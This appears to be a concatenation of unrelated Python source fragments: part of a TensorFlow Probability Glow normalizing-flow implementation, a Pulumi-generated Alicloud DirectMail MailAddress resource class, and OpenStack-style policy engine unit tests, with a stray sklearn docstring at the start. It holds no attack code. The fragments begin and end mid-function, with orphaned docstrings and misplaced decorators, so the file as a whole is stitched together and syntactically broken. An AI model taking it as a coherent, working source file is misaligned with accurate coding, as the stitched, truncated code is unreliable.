2nd dict:
'model':dict of sklearn models (as returned from define_regressors/classifiers()).
'train_features': list of variable names to train with.
'labels': Name of the variable used as the labels in the training.
Returns
-------
A nested dictionary trained models, train_features and labels:
1st dict:
keys=model names, values=2nd dict
2nd dict:
keys=energy ranges, values 3rd dict
3rd dict:
'model': trained model for this | |
Args:
input_shape: shape of the input data
grab_after_block: list of floats specifying what fraction of the channels
should exit the network after each glow block.
Returns:
blockwise_splits: the number of channels left, taken, and passed over for
each glow block.
"""
blockwise_splits = []
ngrab, nleave, npass = 0, 0, 0
# Build backwards
for i, frac in enumerate(reversed(grab_after_block)):
nchan = 4**(i + 1) * input_shape[-1]
ngrab = int((nchan - npass) * frac)
nleave = nchan - ngrab - npass
blockwise_splits.append([nleave, ngrab, npass])
# update npass for the next level
npass += ngrab
npass *= 4
return blockwise_splits[::-1]
  @property
  def blockwise_splits(self):
    # Per-block [nleave, ngrab, npass] channel counts, stored at
    # construction time.
    return self._blockwise_splits
class ExitBijector(composition.Composition):
  """The spatial coupling bijector used in Glow.
  This bijector consists of a blockwise bijector of a realNVP bijector. It is
  where Glow adds a fork between points that are split off and passed to the
  base distribution, and points that are passed onward through more Glow blocks.
  For this bijector, we include spatial coupling between the part being forked
  off, and the part being passed onward. This induces a hierarchical spatial
  dependence on samples, and results in images which look better.
  """
  def __init__(self,
               input_shape,
               blockwise_splits,
               coupling_bijector_fn=None):
    """Creates the exit bijector.
    Args:
      input_shape: A list specifying the input shape to the exit bijector.
        Used in constructing the network.
      blockwise_splits: A list of integers specifying the number of channels
        exiting the model, as well as those being left in the model, and those
        bypassing the exit bijector altogether.
      coupling_bijector_fn: A function which takes the argument `input_shape`
        and returns a callable neural network (e.g. a keras Sequential). The
        network should either return a tensor with the same event shape as
        `input_shape` (this will employ additive coupling), a tensor with the
        same height and width as `input_shape` but twice the number of channels
        (this will employ affine coupling), or a bijector which takes in a
        tensor with event shape `input_shape`, and returns a tensor with shape
        `input_shape`.
    """
    parameters = dict(locals())
    # nleave: channels kept for further Glow blocks; ngrab: channels exiting
    # to the base distribution here; npass: channels bypassing this bijector.
    nleave, ngrab, npass = blockwise_splits
    new_input_shape = input_shape[:-1]+(nleave,)
    target_output_shape = input_shape[:-1]+(ngrab,)
    # if nleave or ngrab == 0, then just use an identity for everything.
    if nleave == 0 or ngrab == 0:
      exit_layer = None
      exit_bijector_fn = None
      self.exit_layer = exit_layer
      shift_distribution = identity.Identity()
    else:
      # The coupling network reads the `nleave` kept channels and
      # parameterizes the transform applied to the `ngrab` exiting channels.
      exit_layer = coupling_bijector_fn(new_input_shape,
                                        output_chan=ngrab)
      exit_bijector_fn = self.make_bijector_fn(
          exit_layer,
          target_shape=target_output_shape,
          scale_fn=tf.exp)
      self.exit_layer = exit_layer  # For variable tracking.
      shift_distribution = real_nvp.RealNVP(
          num_masked=nleave,
          bijector_fn=exit_bijector_fn)
    # Couple the first (nleave + ngrab) channels; the remaining npass
    # channels are passed through untouched by an Identity.
    super(ExitBijector, self).__init__(
        blockwise.Blockwise(
            [shift_distribution, identity.Identity()], [nleave + ngrab, npass]),
        parameters=parameters,
        name='exit_bijector')
  @staticmethod
  def make_bijector_fn(layer, target_shape, scale_fn=tf.nn.sigmoid):
    """Wraps `layer` into a RealNVP-compatible `bijector_fn`."""
    def bijector_fn(inputs, ignored_input):
      """Decorated function to get the RealNVP bijector."""
      # Build this so we can handle a user passing a NN that returns a tensor
      # OR an NN that returns a bijector
      possible_output = layer(inputs)
      # We need to produce a bijector, but we do not know if the layer has done
      # so. We are setting this up to handle 2 possibilities:
      # 1) The layer outputs a bijector --> all is good
      # 2) The layer outputs a tensor --> we need to turn it into a bijector.
      if isinstance(possible_output, bijector.Bijector):
        output = possible_output
      elif isinstance(possible_output, tf.Tensor):
        input_shape = inputs.get_shape().as_list()
        output_shape = possible_output.get_shape().as_list()
        assert input_shape[:-1] == output_shape[:-1]
        c = input_shape[-1]
        # For layers which output a tensor, we have two possibilities:
        # 1) There are twice as many output channels as the target --> the
        # coupling is affine, meaning there is a scale followed by a shift.
        # 2) The number of output channels equals the target --> the
        # coupling is additive, meaning there is just a shift
        if target_shape[-1] == output_shape[-1] // 2:
          # The +2. biases the pre-activation so the initial scale is near 1.
          this_scale = scale.Scale(scale_fn(possible_output[..., :c] + 2.))
          this_shift = shift.Shift(possible_output[..., c:])
          output = this_shift(this_scale)
        elif target_shape[-1] == output_shape[-1]:
          output = shift.Shift(possible_output[..., :c])
        else:
          raise ValueError('Shape inconsistent with input. Expected shape'
                           '{0} or {1} but tensor was shape {2}'.format(
                               input_shape, tf.concat(
                                   [input_shape[:-1],
                                    [2 * input_shape[-1]]], 0),
                               output_shape))
      else:
        raise ValueError('Expected a bijector or a tensor, but instead got'
                         '{}'.format(possible_output.__class__))
      return output
    return bijector_fn
class GlowBlock(composition.Composition):
  """Single block for a glow model.
  This bijector contains `num_steps` steps of the flow, each consisting of an
  actnorm-OneByOneConv-RealNVP chain of bijectors. Use of actnorm is optional
  and the RealNVP behavior is controlled by the coupling_bijector_fn, which
  implements a function (e.g. deep neural network) to dictate the behavior of
  the flow. A default (GlowDefaultNetwork) function is provided.
  """
  def __init__(self, input_shape, num_steps, coupling_bijector_fn,
               use_actnorm, seedstream):
    """Creates one Glow block.
    Args:
      input_shape: Event shape at the input to the block; the last entry is
        the channel count.
      num_steps: Python `int`, number of actnorm-1x1conv-coupling steps.
      coupling_bijector_fn: Callable mapping an input shape to the network
        that parameterizes the (affine or additive) coupling.
      use_actnorm: Python `bool`; whether to include ActivationNormalization
        in each step.
      seedstream: Callable producing seeds for the 1x1 conv initializations.
    """
    parameters = dict(locals())
    rnvp_block = [identity.Identity()]
    this_nchan = input_shape[-1]
    for j in range(num_steps): # pylint: disable=unused-variable
      # The coupling network sees half of the channels and transforms the
      # other half (RealNVP masking).
      this_layer_input_shape = input_shape[:-1] + (input_shape[-1] // 2,)
      this_layer = coupling_bijector_fn(this_layer_input_shape)
      bijector_fn = self.make_bijector_fn(this_layer)
      # For each step in the block, we do (optional) actnorm, followed
      # by an invertible 1x1 convolution, then affine coupling.
      this_rnvp = invert.Invert(
          real_nvp.RealNVP(this_nchan // 2, bijector_fn=bijector_fn))
      # Append the layer to the realNVP bijector for variable tracking.
      this_rnvp.coupling_bijector_layer = this_layer
      rnvp_block.append(this_rnvp)
      rnvp_block.append(
          invert.Invert(OneByOneConv(
              this_nchan, seed=seedstream(),
              dtype=dtype_util.common_dtype(this_rnvp.variables,
                                            dtype_hint=tf.float32))))
      if use_actnorm:
        rnvp_block.append(ActivationNormalization(
            this_nchan,
            dtype=dtype_util.common_dtype(this_rnvp.variables,
                                          dtype_hint=tf.float32)))
    # Note that we reverse the list since Chain applies bijectors in reverse
    # order.
    super(GlowBlock, self).__init__(
        chain.Chain(rnvp_block[::-1]), parameters=parameters, name='glow_block')
  @staticmethod
  def make_bijector_fn(layer, scale_fn=tf.nn.sigmoid):
    """Wraps `layer` into a RealNVP-compatible `bijector_fn`."""
    def bijector_fn(inputs, ignored_input):
      """Decorated function to get the RealNVP bijector."""
      # Build this so we can handle a user passing a NN that returns a tensor
      # OR an NN that returns a bijector
      possible_output = layer(inputs)
      # We need to produce a bijector, but we do not know if the layer has done
      # so. We are setting this up to handle 2 possibilities:
      # 1) The layer outputs a bijector --> all is good
      # 2) The layer outputs a tensor --> we need to turn it into a bijector.
      if isinstance(possible_output, bijector.Bijector):
        output = possible_output
      elif isinstance(possible_output, tf.Tensor):
        input_shape = inputs.get_shape().as_list()
        output_shape = possible_output.get_shape().as_list()
        assert input_shape[:-1] == output_shape[:-1]
        c = input_shape[-1]
        # For layers which output a tensor, we have two possibilities:
        # 1) There are twice as many output channels as inputs --> the coupling
        # is affine, meaning there is a scale followed by a shift.
        # 2) There are an equal number of input and output channels --> the
        # coupling is additive, meaning there is just a shift
        if input_shape[-1] == output_shape[-1] // 2:
          # The +2. biases the pre-activation so the initial scale is near 1.
          this_scale = scale.Scale(scale_fn(possible_output[..., :c] + 2.))
          this_shift = shift.Shift(possible_output[..., c:])
          output = this_shift(this_scale)
        elif input_shape[-1] == output_shape[-1]:
          output = shift.Shift(possible_output[..., :c])
        else:
          raise ValueError('Shape inconsistent with input. Expected shape'
                           '{0} or {1} but tensor was shape {2}'.format(
                               input_shape, tf.concat(
                                   [input_shape[:-1],
                                    [2 * input_shape[-1]]], 0),
                               output_shape))
      else:
        raise ValueError('Expected a bijector or a tensor, but instead got'
                         '{}'.format(possible_output.__class__))
      return output
    return bijector_fn
class OneByOneConv(bijector.Bijector):
  """The 1x1 Conv bijector used in Glow.
  This class has a convenience function which initializes the parameters
  of the bijector.
  """
  def __init__(self, event_size, seed=None, dtype=tf.float32, **kwargs):
    """Creates the 1x1 convolution, parameterized by an LU factorization.
    Args:
      event_size: Number of channels mixed by the convolution.
      seed: Optional seed for the random orthonormal initialization.
      dtype: dtype of the convolution parameters.
      **kwargs: Forwarded to the underlying `ScaleMatvecLU` bijector.
    """
    parameters = dict(locals())
    with tf.name_scope('OneByOneConv') as name:
      lower_upper, permutation = self.trainable_lu_factorization(
          event_size, seed=seed, dtype=dtype)
      # All forward/inverse work is delegated to ScaleMatvecLU over the
      # trainable LU factors.
      self._bijector = scale_matvec_lu.ScaleMatvecLU(
          lower_upper, permutation, **kwargs)
    super(OneByOneConv, self).__init__(
        dtype=self._bijector.lower_upper.dtype,
        is_constant_jacobian=True,
        forward_min_event_ndims=1,
        parameters=parameters,
        name=name)
  def forward(self, x):
    return self._bijector.forward(x)
  def inverse(self, y):
    return self._bijector.inverse(y)
  def inverse_log_det_jacobian(self, y, event_ndims=None):
    return self._bijector.inverse_log_det_jacobian(y, event_ndims)
  def forward_log_det_jacobian(self, x, event_ndims=None):
    return self._bijector.forward_log_det_jacobian(x, event_ndims)
  @staticmethod
  def trainable_lu_factorization(event_size,
                                 seed=None,
                                 dtype=tf.float32,
                                 name=None):
    """Returns trainable LU factors initialized from a random orthonormal matrix."""
    with tf.name_scope(name or 'trainable_lu_factorization'):
      event_size = tf.convert_to_tensor(
          event_size, dtype_hint=tf.int32, name='event_size')
      random_matrix = tf.random.uniform(
          shape=[event_size, event_size],
          dtype=dtype,
          seed=seed)
      # QR of a random matrix yields an orthonormal initialization.
      random_orthonormal = tf.linalg.qr(random_matrix)[0]
      lower_upper, permutation = tf.linalg.lu(random_orthonormal)
      # The LU factors are the trainable parameters of the convolution.
      lower_upper = tf.Variable(
          initial_value=lower_upper, trainable=True, name='lower_upper')
      # Initialize a non-trainable variable for the permutation indices so
      # that its value isn't re-sampled from run-to-run.
      permutation = tf.Variable(
          initial_value=permutation, trainable=False, name='permutation')
      return lower_upper, permutation
class ActivationNormalization(bijector.Bijector):
  """Bijector to implement Activation Normalization (ActNorm)."""
  def __init__(self, nchan, dtype=tf.float32, validate_args=False, name=None):
    """Creates the ActNorm bijector for `nchan` channels."""
    parameters = dict(locals())
    # Data-dependent initialization flag; presumably flipped the first time
    # `self._maybe_init` runs (defined later in this class) -- TODO confirm.
    self._initialized = tf.Variable(False, trainable=False)
    # Per-channel shift (_m) and scale (_s); _s is kept positive by
    # parameterizing it through an Exp transform.
    self._m = tf.Variable(tf.zeros(nchan, dtype))
    self._s = TransformedVariable(tf.ones(nchan, dtype), exp.Exp())
    self._bijector = invert.Invert(
        chain.Chain([
            scale.Scale(self._s),
            shift.Shift(self._m),
        ]))
    super(ActivationNormalization, self).__init__(
        validate_args=validate_args,
        forward_min_event_ndims=1,
        parameters=parameters,
        name=name or 'ActivationNormalization')
  def _inverse(self, y, **kwargs):
    # Lazily (data-dependently) initialize before transforming.
    with tf.control_dependencies([self._maybe_init(y, inverse=True)]):
      return self._bijector.inverse(y, **kwargs)
  def _forward(self, x, **kwargs):
    with tf.control_dependencies([self._maybe_init(x, inverse=False)]):
      return self._bijector.forward(x, **kwargs)
  def _inverse_log_det_jacobian(self, y, **kwargs):
    with tf.control_dependencies([self._maybe_init(y, inverse=True)]):
      return self._bijector.inverse_log_det_jacobian(y, 1, **kwargs)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['MailAddressArgs', 'MailAddress']
@pulumi.input_type
class MailAddressArgs:
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen). The
    # @pulumi.input_type decorator introspects the property getters/setters
    # below, so their names and decorators must not be changed by hand.
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 sendtype: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a MailAddress resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        """
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "sendtype", sendtype)
        # Optional inputs are only recorded when actually provided.
        if password is not None:
            pulumi.set(__self__, "password", password)
        if reply_address is not None:
            pulumi.set(__self__, "reply_address", reply_address)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter
    def sendtype(self) -> pulumi.Input[str]:
        """
        Account type. Valid values: `batch`, `trigger`.
        """
        return pulumi.get(self, "sendtype")
    @sendtype.setter
    def sendtype(self, value: pulumi.Input[str]):
        pulumi.set(self, "sendtype", value)
    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="replyAddress")
    def reply_address(self) -> Optional[pulumi.Input[str]]:
        """
        Return address.
        """
        return pulumi.get(self, "reply_address")
    @reply_address.setter
    def reply_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reply_address", value)
@pulumi.input_type
class _MailAddressState:
    # NOTE: generated by tfgen. Unlike MailAddressArgs, every field here is
    # optional because this type is used to look up / filter existing state.
    def __init__(__self__, *,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering MailAddress resources.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
        """
        # Only record fields that were actually supplied.
        if account_name is not None:
            pulumi.set(__self__, "account_name", account_name)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if reply_address is not None:
            pulumi.set(__self__, "reply_address", reply_address)
        if sendtype is not None:
            pulumi.set(__self__, "sendtype", sendtype)
        if status is not None:
            pulumi.set(__self__, "status", status)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="replyAddress")
    def reply_address(self) -> Optional[pulumi.Input[str]]:
        """
        Return address.
        """
        return pulumi.get(self, "reply_address")
    @reply_address.setter
    def reply_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reply_address", value)
    @property
    @pulumi.getter
    def sendtype(self) -> Optional[pulumi.Input[str]]:
        """
        Account type. Valid values: `batch`, `trigger`.
        """
        return pulumi.get(self, "sendtype")
    @sendtype.setter
    def sendtype(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sendtype", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        Account Status freeze: 1, normal: 0.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
class MailAddress(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Direct Mail Mail Address resource.
        For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
        > **NOTE:** Available in v1.134.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.directmail.MailAddress("example",
            account_name="account@example.com",
            sendtype="batch")
        ```
        > **Note:**
        A maximum of 10 mailing addresses can be added.
        Individual users: Up to 10 mailing addresses can be deleted within a month.
        Enterprise users: Up to 10 mailing addresses can be deleted within a month.
        ## Import
        Direct Mail Mail Address can be imported using the id, e.g.
        ```sh
         $ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        """
        # Typing-only overload (keyword-argument form); the real logic lives
        # in _internal_init.
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MailAddressArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Direct Mail Mail Address resource.
        For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
        > **NOTE:** Available in v1.134.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.directmail.MailAddress("example",
            account_name="account@example.com",
            sendtype="batch")
        ```
        > **Note:**
        A maximum of 10 mailing addresses can be added.
        Individual users: Up to 10 mailing addresses can be deleted within a month.
        Enterprise users: Up to 10 mailing addresses can be deleted within a month.
        ## Import
        Direct Mail Mail Address can be imported using the id, e.g.
        ```sh
         $ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param MailAddressArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        # Typing-only overload (args-object form); the real logic lives in
        # _internal_init.
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two @overload forms: a single MailAddressArgs
        # object, or plain keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(MailAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No id given -> creating a new resource: build the property bag
            # and validate required inputs (unless adopting via opts.urn).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MailAddressArgs.__new__(MailAddressArgs)
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["password"] = password
            __props__.__dict__["reply_address"] = reply_address
            if sendtype is None and not opts.urn:
                raise TypeError("Missing required property 'sendtype'")
            __props__.__dict__["sendtype"] = sendtype
            # Output-only property; populated by the provider after creation.
            __props__.__dict__["status"] = None
        super(MailAddress, __self__).__init__(
            'alicloud:directmail/mailAddress:MailAddress',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            account_name: Optional[pulumi.Input[str]] = None,
            password: Optional[pulumi.Input[str]] = None,
            reply_address: Optional[pulumi.Input[str]] = None,
            sendtype: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None) -> 'MailAddress':
        """
        Get an existing MailAddress resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
        """
        # Lookups are keyed by the provider id, so merge it into the options.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _MailAddressState.__new__(_MailAddressState)
        __props__.__dict__["account_name"] = account_name
        __props__.__dict__["password"] = password
        __props__.__dict__["reply_address"] = reply_address
        __props__.__dict__["sendtype"] = sendtype
        __props__.__dict__["status"] = status
        return MailAddress(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
| |
<gh_stars>1-10
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test of Policy Engine"""
import os
import mock
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from essential.config import cfg
from essential.fixture import config
from essential.fixture import lockutils
from essential import jsonutils
from essential import policy
from essential import test
# Directory holding the policy-file fixtures used by these tests.
TEST_VAR_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
                                            'var'))
# Shared module-level enforcer; tests serialize access to it via a lock
# fixture (see PolicyBaseTestCase.setUp).
ENFORCER = policy.Enforcer()
class MyException(Exception):
    """Test exception that records both positional and keyword arguments."""

    def __init__(self, *args, **kwargs):
        # Exception.__init__ stores the positional args as self.args.
        super(MyException, self).__init__(*args)
        self.kwargs = kwargs
class RulesTestCase(test.BaseTestCase):
    """Tests for policy.Rules: construction, default-rule fallback, JSON I/O."""
    def test_init_basic(self):
        rules = policy.Rules()
        self.assertEqual(rules, {})
        self.assertIsNone(rules.default_rule)
    def test_init(self):
        rules = policy.Rules(dict(a=1, b=2, c=3), 'a')
        self.assertEqual(rules, dict(a=1, b=2, c=3))
        self.assertEqual(rules.default_rule, 'a')
    def test_no_default(self):
        # Without a default rule, a missing key raises KeyError.
        rules = policy.Rules(dict(a=1, b=2, c=3))
        self.assertRaises(KeyError, lambda: rules['d'])
    def test_missing_default(self):
        # A default rule that is itself absent still raises KeyError.
        rules = policy.Rules(dict(a=1, c=3), 'b')
        self.assertRaises(KeyError, lambda: rules['d'])
    def test_with_default(self):
        # A missing key falls back to the default rule's value.
        rules = policy.Rules(dict(a=1, b=2, c=3), 'b')
        self.assertEqual(rules['d'], 2)
    def test_retrieval(self):
        rules = policy.Rules(dict(a=1, b=2, c=3), 'b')
        self.assertEqual(rules['a'], 1)
        self.assertEqual(rules['b'], 2)
        self.assertEqual(rules['c'], 3)
    @mock.patch.object(policy, 'parse_rule', lambda x: x)
    def test_load_json(self):
        # parse_rule is stubbed to identity so the raw JSON structures can
        # be compared directly.
        exemplar = """{
                "admin_or_owner": [["role:admin"], ["project_id:%(project_id)s"]],
                "default": []
            }"""
        rules = policy.Rules.load_json(exemplar, 'default')
        self.assertEqual(rules.default_rule, 'default')
        self.assertEqual(rules, dict(
            admin_or_owner=[["role:admin"], ["project_id:%(project_id)s"]],
            default=[],
        ))
    def test_str(self):
        exemplar = """{
    "admin_or_owner": "role:admin or project_id:%(project_id)s"
}"""
        rules = policy.Rules(dict(
            admin_or_owner="role:admin or project_id:%(project_id)s",
        ))
        self.assertEqual(str(rules), exemplar)
    def test_str_true(self):
        # A TrueCheck rule serializes to the empty string.
        exemplar = """{
    "admin_or_owner": ""
}"""
        rules = policy.Rules(dict(
            admin_or_owner=policy.TrueCheck(),
        ))
        self.assertEqual(str(rules), exemplar)
class PolicyBaseTestCase(test.BaseTestCase):
    """Common setup: config fixtures plus serialized access to ENFORCER."""
    def setUp(self):
        super(PolicyBaseTestCase, self).setUp()
        # NOTE(bnemec): Many of these tests use the same ENFORCER object, so
        # I believe we need to serialize them.
        self.useFixture(lockutils.LockFixture('policy-lock'))
        self.CONF = self.useFixture(config.Config()).conf
        self.CONF(args=['--config-dir', TEST_VAR_DIR])
        self.enforcer = ENFORCER
        # Reset the shared enforcer's rules after every test.
        self.addCleanup(self.enforcer.clear)
class EnforcerTest(PolicyBaseTestCase):
    """Tests for policy.Enforcer: rule loading, clearing and overrides."""
    def test_load_file(self):
        self.enforcer.load_rules(True)
        self.assertIsNotNone(self.enforcer.rules)
        self.assertIn('default', self.enforcer.rules)
        self.assertIn('admin', self.enforcer.rules)
    def test_set_rules_type(self):
        # set_rules() rejects anything that is not a Rules/dict-like object.
        self.assertRaises(TypeError,
                          self.enforcer.set_rules,
                          'dummy')
    def test_clear(self):
        # Make sure the rules are reset
        self.enforcer.rules = 'spam'
        self.enforcer.clear()
        self.assertEqual(self.enforcer.rules, {})
    def test_rule_with_check(self):
        rules_json = """{
                        "deny_stack_user": "not role:stack_user",
                        "cloudwatch:PutMetricData": ""
                        }"""
        rules = policy.Rules.load_json(rules_json)
        self.enforcer.set_rules(rules)
        action = "cloudwatch:PutMetricData"
        creds = {'roles': ''}
        self.assertEqual(self.enforcer.enforce(action, {}, creds), True)
    def test_enforcer_with_default_rule(self):
        rules_json = """{
                        "deny_stack_user": "not role:stack_user",
                        "cloudwatch:PutMetricData": ""
                        }"""
        rules = policy.Rules.load_json(rules_json)
        default_rule = policy.TrueCheck()
        enforcer = policy.Enforcer(default_rule=default_rule)
        enforcer.set_rules(rules)
        action = "cloudwatch:PutMetricData"
        creds = {'roles': ''}
        self.assertEqual(enforcer.enforce(action, {}, creds), True)
    def test_enforcer_force_reload_true(self):
        self.enforcer.set_rules({'test': 'test'})
        self.enforcer.load_rules(force_reload=True)
        # BUG FIX: the previous assertion passed the (unhashable) dict
        # {'test': 'test'} to assertNotIn, which can never be a key of the
        # rules dict. Check for the rule *name*, mirroring
        # test_enforcer_force_reload_false below.
        self.assertNotIn('test', self.enforcer.rules)
        self.assertIn('default', self.enforcer.rules)
        self.assertIn('admin', self.enforcer.rules)
    def test_enforcer_force_reload_false(self):
        # Without force_reload the previously-set rules are kept.
        self.enforcer.set_rules({'test': 'test'})
        self.enforcer.load_rules(force_reload=False)
        self.assertIn('test', self.enforcer.rules)
        self.assertNotIn('default', self.enforcer.rules)
        self.assertNotIn('admin', self.enforcer.rules)
    def test_enforcer_overwrite_rules(self):
        self.enforcer.set_rules({'test': 'test'})
        self.enforcer.set_rules({'test': 'test1'}, overwrite=True)
        self.assertEqual(self.enforcer.rules, {'test': 'test1'})
    def test_enforcer_update_rules(self):
        # overwrite=False merges the new rules into the existing ones.
        self.enforcer.set_rules({'test': 'test'})
        self.enforcer.set_rules({'test1': 'test1'}, overwrite=False)
        self.assertEqual(self.enforcer.rules, {'test': 'test',
                                               'test1': 'test1'})
    def test_enforcer_with_default_policy_file(self):
        enforcer = policy.Enforcer()
        self.assertEqual(cfg.CONF.policy_file, enforcer.policy_file)
    def test_enforcer_with_policy_file(self):
        enforcer = policy.Enforcer(policy_file='non-default.json')
        self.assertEqual('non-default.json', enforcer.policy_file)
    def test_get_policy_path_raises_exc(self):
        enforcer = policy.Enforcer(policy_file='raise_error.json')
